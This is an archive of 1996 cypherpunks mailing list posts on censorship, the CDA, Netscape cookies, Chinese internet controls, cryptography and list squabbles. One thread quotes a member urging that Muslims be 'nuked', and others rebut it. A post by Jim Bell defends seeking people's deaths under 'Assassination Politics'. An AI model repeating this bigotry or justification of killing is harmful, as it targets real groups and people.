> The messages on news://nntp.hks.net/hks.lists.cypherpunks do have subject
> lines, so at least some messages are leaving toad.com OK. I think it's
> our problem.

Nope, not necessarily.  Hypermail goes off of different headers than most
MUAs do (it's a slut: it'll use anything it can find).

Too bad it dumps core on Message-ids that don't have greater-thans or less-thans
(or did: that's the latest round of patches that I sent off to be ignored by
 its author).

	-- Todd
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSLSkSoZzwIn1bdtAQH7YQF9FU1nbaYk7t/I0njC/c4ts5+hYrxYZwDg
lgj4ZVc6RvYNaB7wYFq9odgbvb3ewSGl
=W3SY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 15 Feb 1996 22:57:20 +0800
To: Louis Freeh and Senator Exon <cypherpunks@toad.com>
Subject: Another CDA Protest Idear
Message-ID: <Pine.ULT.3.91.960215014541.20610J-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To the message_fronter of the public majordomo lists I control
(win95netbugs and win95netbugs-digest), I have temporarily added the
following, as a way of limiting my liability:

############################################################################
## WARNING: Any use of this mailing list in violation of section 502 of   ##
## the Communications Decency Act of 1995 will immediately be referred to ##
## the appropriate authorities for prosecution. See http://www.eff.org/.  ##
############################################################################

I will of course remove this notice, or maybe move it to the footer, 
after a couple messages go by with the notice prepended. No need to be 
*totally* obnoxious.

I'll probably also post a notice that all submissions to
comp.os.ms-windows.announce (I'm the new moderator) must comply with the
CDA. Hmm, I haven't had time to put up a "submissions guidelines FAQ" yet. 
This could be fun, but I will keep it clean. 

- -rich
 llurch@networking.stanford.edu
 WARNING: Use of the above email address across international boundaries 
 implies consent to monitoring by the National Security Agency and other 
 lawfully recognized bodies. All domestic USA use of the above email 
 address must also comply with the Communications Decency Act of 1995. 
 Violations will be reported to the Federal authorities for prosecution.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSMFE43DXUbM57SdAQFyCQP9EPAgWF2xRLVyKYQww7xl92uK8kS/tFx6
4mUzkI2MhFTwfKCeEZvtmBzcGYhICDuJXZGGnHVNpaFSJKBJvRGfRazAMrcf1/Aq
V8RHXqBA6OgFpHTAh90dpuB/azGcOsP5YN9lVe3t+bCnlivVXA0N71PXC82e/ORd
5DZnU/3LPo0=
=esOC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Davis <eagle@armory.com>
Date: Thu, 15 Feb 1996 23:58:33 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: Secrecy of NSA Affiliation
In-Reply-To: <199602131959.OAA16076@universe.digex.net>
Message-ID: <9602150257.aa22395@deepthought.armory.com>
MIME-Version: 1.0
Content-Type: text


> This sounds about right.  When I was an NSA employee ('83), our
> introductory briefing included the suggestion (I don't recall it being
> phrased as a command command) that we identify ourselves as DoD.  It
> was suggested that this might lessen our visibility as espionage
> targets.

You can read the NSA Employees Manual at http://nyx10.cs.du.edu:8001/~eagle
-- 
According to John Perry Barlow:                       *What is EFF?* 
"Jeff Davis is a truly gifted trouble-maker." *email <info@eff.org>*
*** O U T L A W S  On The  E L E C T R O N I C  F R O N T I E R ****
US Out Of Cyberspace!!! Join EFF Today! *email <membership@eff.org>*   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 15 Feb 1996 18:18:55 +0800
To: cypherpunks@toad.com
Subject: Re: Error Condition Re: UNSCRIBING
Message-ID: <199602150225.DAA25747@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by lharrison@mhv.net ("Lynne L. Harrison") on 
Wed, 14 Feb 10:12 AM

>>An MIT student, no doubt hoping to enhance the 
>>reputation of his school, wrote:
>>
>>>>      Who the fuck are you? .......As for your ending 
remarks I don't give
>>>>a fuck what Judge Ito, Tim May or any other person has to 
say.
>
>  The best thing is to annoy the message.  UNSCRIBE 
>messages hit the c|punks  list every so often.  Rest 
>assured that the MIT student knows very well how  to 
>unsubscribe - and how to spell.



Yeah, place your bet that Tim writes these trolls and answers 
them, pumping the conversation, fostering coy controversies. 
Smart guy, bores easily, likes to lure the rubes, he says. Toy 
with them, spout outrageous remarks, act indiginant when they 
are challenged, feign hurt, let suckers defend him.


Sometimes mimics Rimm, may impersonate him, too, or coach 
Marty, who knows? He's got lots of Net personas, seldom non 
grata. He's a vintage infotainer, California dreaming, an 
export techno-wine of the region.


Avid Rube







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: printing@explicit.com (William Knowles)
Date: Fri, 16 Feb 1996 01:04:34 +0800
To: cypherpunks@toad.com
Subject: Re: Some thoughts on the Chinese Net
Message-ID: <m0tn2dE-000rLgC@maki.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 14 Feb 1996, Ed Carp wrote about Chinese censonship:

>I think it *will* work, in part because China has a very long history of
>repressing and persecuting its own people.  Besides, if they really get in
>a tight spot, there's always "the nuclear option." 

>If you think I'm kidding, read the news about China threatening to nuke
>Taiwan if they declare independence. 

I dunno on that one, Did you see the tape of the Chinese rocket with the 
U.S. telecommunications satellite exploding?

But they did censor that pretty quickly!

William Knowles
Graphically Explicit


//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\ 
  Graphically Explicit                     
  Printing - Advertising - Graphic Design  
  1555 Sherman Avenue - Suite 203          
  Evanston IL., 60201-4421                 
  800.570.0471 - printing@explicit.com
  Accept, Embrace, Adapt, Create     
\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 16 Feb 1996 03:22:03 +0800
To: cypherpunks@toad.com
Subject: Canada (was Re: Regulation of citizen-alien communications (Was: Choices))
Message-ID: <199602151431.GAA02174@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


[Attributions lost in the flow]

> >Oh?  You mean that I can get busted for giving my Canadian spouse a copy 
> >of PGP?
> >
> 
> Nah - Canada is America's 51st state :-)

Until you try to bring your laptop back across the border.

On a recent trip, I was actually stopped at customs and asked about my 4
year old Dell.  Of course, I had purchased it in the US, but I didn't even
want to think about the .. er .. things that I had on the hard drive.

Linux with pgp, cfs, ssh, and a number of other interesting packages
installed. 

Should I have been worried?

yup




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Fri, 16 Feb 1996 01:42:38 +0800
To: fdr@osf.org (Franklin Reynolds)
Subject: Re: Linux on the Mac
In-Reply-To: <199602142221.RAA11704@postman.osf.org>
Message-ID: <199602151207.HAA01960@localhost.cjs.net>
MIME-Version: 1.0
Content-Type: text


> >> In the latest PowerPC news it is reported that OSF is porting Linux
> >> to the Mac with the support of Apple.  Apple has a web site -
> >> www.mklinux.apple.com that discusses this and has a link to the OSF
> >> site.  In my book, this is a GoodThing(tm).  Of course, being a huge
> >> fan of both the Mac and unix might put me in the minority ;-)
> >
> >They aren't *really* porting Linux to powermac. They're throwing a
> >little bit of paint on OSF/1 and hiding some stuff in libc.
> >
> >Looks to me like they are basicly trying to ca$h in on the Linux name
> >and reputation without contributing anything to the cause.
> *Sigh*
> 
> OSF ported Linux to our microkernel which is derived from Mach 3.0
> from CMU. And we have ported our kernel and the Linux server to

Mach != Linux. When people use use this thing, they will *not* be
using Linux in any way shape of form. The drivers and such that you
develop will be completely worthless to Linux proper without someone
spending months to port them, and advances in Linux such as the new
page cache or the upcoming revision of ext2fs may not show themselves
on your "linux" for an equal period of time.

This comes back to my belief that you folks are just trying to cash in
on Linux's name and reputation without contributing something directly
to the cause. Why didn;t you just call it it "OSF/1 for PowerMac" and
include an ext2fs server? Hindsight? Why don't you just port Linux
proper to PowerMac? 

(and how did this get on cypherpunks?)

Christopher




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 16 Feb 1996 01:46:18 +0800
To: cypherpunks@toad.com
Subject: Re: Science News - article on Quantum Crypto
Message-ID: <v02120d06ad48d5e6491a@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



>The new Science News that showed up in today's mail
>has a short but informative article on quantum
>cryptography.  It explains what quantum crypto is for
>us newbies and gives the history of a recent success
>in Lake Geneva (Switzerland, not Wisconsin) - an
>encrypted message was sent 22.7 km over fiber-optic
>cable successfully.  It's a nice article.

Does anyone know if the new in-line optical amplifiers (not switches!) have
any effect on quantum crypto messages?

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 16 Feb 1996 04:59:19 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Carrying the Bible an Offense?
In-Reply-To: <ad47f4eb0e021004f610@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.960215082228.10785B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 14 Feb 1996, Timothy C. May wrote:
> 
> 1. Private citizens (the atheist in this case) do not file criminal
> charges. They may swear out a complaint ("I witnessed John Doe carrying a
> Bible"), but they do not file criminal charges.
> 

I don't know about the US, but under British common law it's possible to 
bring private prosecutions; this is incredibly rare, but still possible.


---
They say in  online country		So which side are you on boys
There is no middle way			Which side are you on
You'll either be a Usenet man		Which side are you on boys
Or a thug for the CDA			Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gw <geeman@best.com>
Date: Fri, 16 Feb 1996 05:07:59 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: anonymous age credentials, sharing of
Message-ID: <199602151626.IAA20391@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:38 PM 2/14/96 -0500, you wrote:
>Suppose Alice is a CA who issues anonymous age credentials.
>Bob is 15
>Carol is 25
>
>Carol gets a legitimate anonymous age credential from Alice bound to an 
>anonymous public key generated for this purpose.  Carol then gives the 
>key pair to Bob.  Bob uses to do things only adults are legally permitted 
>to do.  (It's not bound to Carol's everday keypair because that's not 
>anonymous....)
>
>What can stop Bob and Carol from subverting a scheme that relies on 
>anonymous age creditials in this manner?
>
>If the answer is "nothing" this might mean that purveyors of "adult" 
>material might have no defense against a law requiring that they collect a 
>True Name + age creditential....
>
>A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
>Associate Professor of Law | 
>U. Miami School of Law     | froomkin@law.miami.edu
>P.O. Box 248087            | http://www.law.miami.edu/~froomkin
>Coral Gables, FL 33124 USA | It's warm here.
>
>
I believe the answer is nothing ... but the situation is no different than
Carol going into Le Sexxey Shoppey, buying a porn-pack of restricted
material, and then giving it to Bob.

As has been said in this forum and others before, in the limit all access
control comes down to positive identification of an individual.  Unless We,
the People, want to support permanently binding a traceable, non-anonymous
identity to all certificate attributes that are used in electronic exchange
(age, etc...) then there is going to be the potential for someone to
deliberately allow their credential to be misused.

IMO, to prevent this totally would require implanting a non-forgable i.d.
chip in everyone at birth ..... not very appealing.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Steven C. Perkins" <sperkins@andromeda.rutgers.edu>
Date: Fri, 16 Feb 1996 02:21:12 +0800
To: cypherpunks@toad.com
Subject: Re: Online Zakat Payment: Religious tithe.
Message-ID: <1.5.4b11.32.19960215132811.0071d93c@andromeda.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


I am resending Mr. Gabb's message edited to show that Mr. May wrote the
three lines in question.

SC Perkins


At 10:34 AM 2/13/96 +0000, you wrote:
>On Mon, 12 Feb 1996, Timothy C. May wrote:
>
> Once again, the gutter religion of Islam reveals the derangement of its
> so-called Prophet.
> 
> The world really needs to get around to nuking these folks.
> 
>Oh, Come now!  Islam may in its present form be a religion deeply hostile 
>to liberty.  But since "nuking" the whole Islamic world would not be 
>itself much of a defence of freedom, the only long term answer is to 
>promote within Islam the same kind of Reformation as eventually made 
>Christianity half decent.  And Tim's comments do not contribute to that.  
>I don't know how many internet servers there are in the Middle East.  
>But, if I were an intelligent fundamentalist, I'd be copying it all over 
>the place.  "Look", I'd be saying, "these people really do mean another 
>crusade to destroy us and our faith".
>
>I can understand Tim's disgust with these people.  But I do question his 
>manner of expressing it.
>
>
*****************************************************************************
Steven C. Perkins                             sperkins@andromeda.rutgers.edu
User Services Coordinator, Rutgers School of Law at Newark
15 Washington Street					 Newark, NJ  07102
VOX: 201-648-5965                                        FAX:  201-648-1356
                 http://www.rutgers.edu/RUSLN/rulnindx.html
                     http://www.rutgers.edu/lawschool.html
"Raise your voices to the Sky. It is a Good Day to die." Chief Crazy Horse
*****************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 16 Feb 1996 19:46:26 +0800
To: jsw@netscape.com
Subject: Re: Cookie Crumbles
Message-ID: <199602151345.IAA10572@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by jsw@netscape.com (Jeff Weinstein) on Thu, 
15 Feb  1:22 AM


>  You may choose not to believe me, but I have been 
>planning to add an option  to disable cookies in the 
>next release for quite some time now.
>
>  Just disabling cookies won't keep sites from tracking 
>your movements.  Many sites require you to register and 
>log in when you access them.  These sites will be able 
>to track your movements through them with or  without 
>cookies.


Jeff,


You shoot electro-ammunition straight, so your credibility is 
solid. HQ should take target practice from you. Although 
explanations on this list may not be comprehensible to the 
public, or to NSCP's PR Dept.


What are the chances that NSCP might add a feature that would 
allow customers to say yes or no at login to tracking their 
movements at any site visited, with a friendly notice that 
tracking analysis was being done?


That might redeem the exchange value of cookies, and perhaps 
come closer to gving customers equality with the merchants, and 
merchants credibility with customers. As you are giving 
Netscape here, despite Wall Street's treachery.


Thanks for your even-tempered and well-aimed potshots here.


John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@doe.ernet.in>
Date: Fri, 16 Feb 1996 06:04:02 +0800
To: David A Wagner <daw@dawn7.cs.berkeley.edu>
Subject: Re: Firewall USA to Firewall China
In-Reply-To: <199602132225.RAA29121@bb.hks.net>
Message-ID: <Pine.3.89.9602150843.E6003-0100000@mahavir>
MIME-Version: 1.0
Content-Type: text/plain


> Hmm, I'd argue that firewall technology would indeed let China
> filter out many "subversive" thoughts on the Internet.

All it needs is for someone to broadcast Usenet via satellite over Asia, 
as Pagesat does in the US, or use radio. No firewall can keep that out.

Arun Mehta, B-69 Lajpat Nagar-I, New Delhi-24, India. Phone 6841172,6849103
amehta@doe.ernet.in a.mehta@axcess.net.in amehta@cerf.net
http://mahavir.doe.ernet.in/~pinaward/arun.htm
"I do not want my house to be walled in on all sides and my windows to be 
stuffed. I want the cultures of all the lands to be blown about my house 
as freely as possible. But I refuse to be blown off my feet by any."--Gandhi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Hemming - CEO MarketNet"  <johnhemming@mkn.co.uk>
Date: Thu, 15 Feb 1996 22:21:15 +0800
To: cypherpunks@toad.com
Subject: (cpx) secure web page ideas
Message-ID: <1996-Feb15-090001.2>
MIME-Version: 1.0
Content-Type: text/plain


>From: Jon Lasser <jlasser@rwd.goucher.edu>

>For those people who have Netscape / an SSL-enabled web-browser, wouldn't
>it be useful to have secure web pages that did the following:
>(2) A pgp-sending web page (type in key id into field, send message to
>    address given, encrypted)  This isn't a bad idea for the same reason that
>    (1) above is a much better idea.

>How hard would this be to implement? Would it be worth waiting until the PGP
>3.0 API is released?

I have been slogging away with my own SSL browser trying to make it
crash less frequently (it actually crashes more often than Netscape).

Before I started on the latest round of changes I had managed to PGP
enable the browser (using my own implementation of PGP) with two web
linked functions:

a)  In the mailto:  Link a PGPKEY="ABCDE" field contains the PGP
public key of the recipient the program then encrypts the mail before
sending it.

b)  In forms using mailto a similar function acheives the same.

I have almost certainly broken the PGP implementation through all the
work I have been doing on the code recently although I think I should be
able to sort this relatively soon.

In other words:

It has been done (ish) see
ftp://193.119.26.70/mktnet/pub/horse.zip

(It also covers 128bit SSL)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 16 Feb 1996 03:21:42 +0800
To: scmayo@rsc.anu.edu.au (Sherry Mayo)
Subject: Re: A good cryptanalysis text?
In-Reply-To: <9602150103.AA22683@toad.com>
Message-ID: <199602151438.JAA28463@homeport.org>
MIME-Version: 1.0
Content-Type: text


Sherry Mayo wrote:

| > A friend of mine is looking for a good introductory cryptanalysis
| > text. Does Schneier's book cover this in much depth or is it more
| > cryptography as the name implies.
| > 
| > My friend is a computer networking admin who is trying to widen
| > his background knowledge of security related issues (this may
| > mean that a more computing oriented intro is more suitable).

My single favorite work is by Ross Anderson.  His paper 'Why
Cryptosystems Fail' is excellent, and unknown for reasons that are not
clear to me.  Perhaps its because he diesn't spend all his time
telling the media how wonderful he is. ;)

Next would be Cheswick & Bellovin.  Both are very smart guys, and they
talk a lot about the philosophy of security.  They have a book
'Firewalls and Internet security,' and both have authored many papers.


Adam



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ashfaq Rasheed <ashfaq@corp.cirrus.com>
Date: Fri, 16 Feb 1996 06:56:28 +0800
To: sperkins@andromeda.rutgers.edu
Subject: Re: Online Zakat Payment: Religious tithe.
Message-ID: <199602151753.AA16558@sunstorm.corp.cirrus.com>
MIME-Version: 1.0
Content-Type: text/plain


Steven

	I was referring to Tim May comments. I am sorry if I was not clear in
my response.

Thanks!
Ashfaq Ahmed

> From sperkins@andromeda.rutgers.edu Thu Feb 15 13:45:35 1996
> X-Sender: sperkins@andromeda.rutgers.edu
> X-Mailer: Windows Eudora Light Version 1.5.4b11 (32)
> Mime-Version: 1.0
> Content-Type> : > text/plain> ; > charset="us-ascii"> 
> To: Ashfaq Rasheed <ashfaq@corp.cirrus.com>
> Subject: Re: Online Zakat Payment: Religious tithe.
> Content-Length: 2796
> X-Lines: 67
> 
> Ashfaq:
> 
> Please note that the lines you underlined were written by Mr. May and not by
> me.  As a descendant of the Prophet Muhammad, blessed be his name, I would
> not write such comments.
> 
> Steven C. Perkins
> 
> 
> 
> At 07:28 PM 2/14/96 -0800, you wrote:
> >> From owner-cypherpunks@toad.com Tue Feb 13 10:34:37 1996
> >> To: "Timothy C. May" <tcmay@got.net>
> >> Cc: cypherpunks@toad.com
> >> Subject: Re: Online Zakat Payment: Religious tithe.
> >> In-Reply-To: <ad4541d1000210045325@[205.199.118.202]>
> >> Mime-Version: 1.0
> >> Content-Type> : > TEXT/PLAIN> ; > charset=US-ASCII> 
> >> Sender: owner-cypherpunks@toad.com
> >> Precedence: bulk
> >> Content-Length: 971
> >> X-Lines: 20
> >> 
> >> On Mon, 12 Feb 1996, Timothy C. May wrote:
> >> 
> >> > At 10:07 PM 2/12/96, Steven C. Perkins wrote:
> >> > Once again, the gutter religion of Islam reveals the derangement of its
> >		^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> >> > so-called Prophet.
> >> > 
> >> > The world really needs to get around to nuking these folks.
> >> > 
> >> Oh, Come now!  Islam may in its present form be a religion deeply hostile 
> >> to liberty.  But since "nuking" the whole Islamic world would not be 
> >> itself much of a defence of freedom, the only long term answer is to 
> >> promote within Islam the same kind of Reformation as eventually made 
> >> Christianity half decent.  And Tim's comments do not contribute to that.  
> >> I don't know how many internet servers there are in the Middle East.  
> >> But, if I were an intelligent fundamentalist, I'd be copying it all over 
> >> the place.  "Look", I'd be saying, "these people really do mean another 
> >> crusade to destroy us and our faith".
> >> 
> >> I can understand Tim's disgust with these people.  But I do question his 
> >> manner of expressing it.
> >> 
> >
> >Actions of certain individual or group does not reflect what the actual
> >religion is. Examples of this can be found on every religion. 
> >
> >Somebody generalizing as above reflects his/her own closed/blocked mentality.
> >
> >Look at yourself, if you can fall to such degrading levels and since you 
> >happen to be a member of this mailing list, it is not ration to think as
> >every cpunks as demented as you are.
> >
> >Ashfaq Ahmed
> >
> >
> *****************************************************************************
> Steven C. Perkins                             sperkins@andromeda.rutgers.edu
> User Services Coordinator, Rutgers School of Law at Newark
> 15 Washington Street					 Newark, NJ  07102
> VOX: 201-648-5965                                        FAX:  201-648-1356
>                  http://www.rutgers.edu/RUSLN/rulnindx.html
>                      http://www.rutgers.edu/lawschool.html
> "Raise your voices to the Sky. It is a Good Day to die." Chief Crazy Horse
> *****************************************************************************
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 16 Feb 1996 04:14:50 +0800
To: cypherpunks@toad.com
Subject: Net Police, Red and in Bed
Message-ID: <199602151529.KAA20629@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   WSJ, 15 February 1996:

   China Tells Internet Users To Register With Police

   Beijing (AP) - China ordered all users of the Internet and
   other international computer networks to register with the
   police, as part of an effort to tighten control over
   information.

   The order came in a circular issued by the Ministry of
   Public Security, according to the state-run Xinhua News
   Agency.

   Xinhua didn't give a date by which current users must
   register but said new users and those switching or
   terminating services must inform police within 30 days. It
   was unclear how foreigners would be affected.

   The rules haven't been published in detail, but previous
   Xinhua reports warned network users not to harm national
   security, reveal state secrets or disseminate pornography.

   China embarked on a broad crackdown on Internet users and
   other sources of information potentially harmful to
   government interests in December.

   The Ministry of Post Telecommunications was made the sole
   provider of channels connecting Chinese computer users with
   international networks.

   -----

   Financial Times, 15 February, 1996

   Cyberlaws [Editorial]

   Communication *sans frontieres*. To the Internet's fans
   that is the essence of its appeal. But to anyone putting
   information on the Internet's World Wide Web, its global
   nature is the cause of a growing headache: how to uphold
   intellectual property rights to the rivers of information
   pouring over its wires.

   Online computer systems such as the Net are among the
   fastest growing ways to distribute information -- music and
   pictures as well as words and numbers. But existing
   copyright laws deal inadequately with digital transmission.
   Regulation is complicated by the way that information
   downloaded in one country can have originated almost
   anywhere in the world. The $35bn-a-year music industry now
   believes that digital copyright abuse is a big future
   threat to its revenues.

   The century-old Berne convention on copyright and the
   General Agreement on Tariffs and Trade represent a degree
   of international agreement on the treatment of such issues.
   However, many countries are not signatories, while
   standards of intellectual property protection vary widely
   among those which have signed.

   Moreover, there are technological problems in enforcing
   agreements even where they exist. At present, it is often
   difficult to identify both those who have accessed
   information, and those who have entered it on the Net.
   Given that problem, some groups want companies providing
   Internet access to be responsible for upholding rules,
   rather than users or publishers. But this is highly
   unattractive: service providers will be unaware of much on
   the Net.

   The currently imperfect state of protection is one reason
   why much cyberinformation is junk, of value to almost
   nobody, deposited partly to stir up interest in paidfor
   services beyond the Net. However, new ways to restrict
   access to parts of the Net, and to charge for subscriptions
   to that information, may address that shortcoming.
   Companies are also working on "electronic tags" which will
   show whether information is passed to unauthorised users.

   If such technological developments bear fruit, the whole
   game may change. The mainstay of the Internet may no longer
   be information already published in another medium.
   Instead, publishers could put material of real value on the
   Net, knowing they would be paid. Other media may be
   squeezed as the Internet assumes some of their role.

   In this respect, copyright problems are a symptom of the
   Internet's immaturity, rather than a sign that electronic
   sophistication has made regulation impossible. The Net
   itself is a creation of technology, not policy, and the
   solutions to this problem are more likely to be
   technological than legal. But solutions must be found if
   the Net is to realise its enormous commercial potential.

   -----

   FT has a front page article on what China may do if
   the US imposes sanctions for copyright violations. It
   includes overtures by the Chinese to Britain to reap the
   benefits of shutting down US businesses in retaliation.
   Noting the well-oiled handover of Hong Kong to China as
   an example of the mutual benefits of imperialist most-
   favored status, and sharing tips and tricks of crackdown
   on civil disorder.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 15 Feb 1996 22:58:38 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199602150942.KAA13880@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Something for Jim Bell and his ilk to think about:

         "If we could climb
               the highest steeple
          And look around at
               all the people,
          And shoot the ones
               not wholly good
          As we, like noble
               shooters, should,
          Why, then there'd be
               an only worry ---
          Who would be left
               to bury 
                 us?"

                 - Walt Kelly







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 16 Feb 1996 07:50:07 +0800
To: cypherpunks@toad.com
Subject: Re: The Emotional Killer (or out of the frying pan and into
Message-ID: <m0tn8cJ-00090NC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 02:51 PM 2/14/96 -0500, tallpaul wrote:
>On Feb 11, 1996 23:48:29, 'jim bell <jimbell@pacifier.com>' wrote: 
> 
> 
>>At 11:59 PM 2/11/96 -0500, tallpaul wrote: 
>>>I want to write on the theme posted to the list in the message below
>where 
>>>J. Bell wrote "It is their ACTIONS that I feel violate my rights; that is
>
>>>what justifies my seeking their deaths, should I choose to do so."  
>>>  
>>>First, one thing that marks the sane adult from the child and the
>floridly 
>>>psychotic adult is the sane adult's knowledge that "feelings" and "facts"
>
>>>are two different things.  
>>>  
>>>It is one thing to "feel," as J. Bell or all of us might, that our rights
>
>>>have been violated.  
>>>  
>>>It is another thing to maintain, as J. Bell uniquely appears to do, that 
>>>the "feeling" gives him the right to seek another person's death.  
>> 
>>You're clearly confused. I was responding to an accusation that I was 
>>defending seeking somebody's death simply because of a disagreement of 
>>OPINION.  My comment was intended to remind the reader that it is the 
>>ACTIONS of a person which justify the self-defense; not simply the 
>>disagreement. 
> 
>I disagree and I believe that my quote (reposted by J. Bell) of his
>original statement supports me. He mentioned "ACTIONS" and he mentioned
>"OPINIONS" but he relied on his "feelings" as the touchstone of reality.
>More than ever I believe that he genuinely cannot understand the
>difference. He still confuses his "feelings" which exist nowhere but inside
>his head with "ACTIONS" which exist outside his head in the real world. 


Frankly, I think you are deliberately engaging in nit-picky semantical 
arguments when your fundamental position is bankrupt.  I've always made it 
clear that I don't "assume" that every person is right in his belief that 
his rights have been violated; rather, I point out that whether they are 
right or  wrong, ultimately you (and me, and society) must deal with the 
FACT of that belief.  

If the person (people?)  in question is actually wrong, then consider it a 
useful task to explain to that person WHY his beliefs are wrong.  If he's 
RIGHT, he has the right to act to defend his rights.  The question of 
whether any given person is right, in any given belief, is an interesting 
matter, but it is only marginally relevant to the subject of "Assassination 
Politics."  Ultimately, people WILL act on what they believe to be true; you 
can't just stick your head in the sand and make them go away.  You can try 
to convince them they're wrong, or you can try to defend yourself against 
their (allegedly misguided) actions:  That is your choice.

Get back to the subject at hand and I'll be happy to continue to debate.  
Engage in silly semantics and I'll be pleased to ignore you.

Jim Bell
jimbell@pacifier.com


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSN1V/qHVDBboB2dAQFObAQAnYKsS2YqWwWVatdTCYBvcq2eGdXD4UNf
0hLC15BHPcK7PPNx2RbgevjatE8+NFCDXsgOYdANDDcCLo9KiXGtHjOg9790msuX
sCLGKkZkijXNe64Bu2tpvcYT1Aqs+PVrYiAad/itieIvCQ3v1GdWSAvuULuNVqP0
TZptrXTDYtE=
=SJtm
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 16 Feb 1996 04:28:35 +0800
To: cypherpunks@toad.com
Subject: 2.5_bil
Message-ID: <199602151556.KAA23380@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The 2-15-96 NYT reports on the design and manufacture of
   the new high-tech Swiss bank note:

      The 50-franc bill is the world's first digital bank note
      -- designed on a computer that resolves its design into
      2.5 billion points, each of them individually accessible
      electronically. There are more than 20 security
      features, though the precise number is a secret. Its
      design is vertical rather than horizontal. Ten printing
      processes are involved, including silk screening for the
      chameleon numbers and hot stamping for the silvery
      elements.

      The Swiss say American bills are "a little outdated,
      even the new ones, as far as the state of the art goes."


   2.5_bil











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Fri, 16 Feb 1996 04:33:25 +0800
To: cypherpunks@toad.com
Subject: Re: Netscrape's Cookies
Message-ID: <9602151600.AA03535@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Alex Strasheim <cp@proust.suba.com> said:

>The best answer would probably be to use the kind of pop-up messages you 
>get when you're going to submit a secure or insecure form.  "You're about 
>to send a cookie back to a web server, continue or abandon?"  "You're 
>about to send mail from a web page, do you want to do that?"  Give people 
>the ability to turn the messages off -- that way functionality isn't 
>impaired.

I find that a very good solution providing that the browser say:
>"You're about to send a cookie...."
Here, I would add:
"... that contain the following information:"

(information list)

"... back to a web server, continue or abandon?"

Otherwise, it not as worse, but still in the same spirit as to 
sign a blank check to a stranger...

( I am telling you... it's been *at least* a million years that
I did not exagerate! :)


Regards to the vast majority of CPunk

JFA
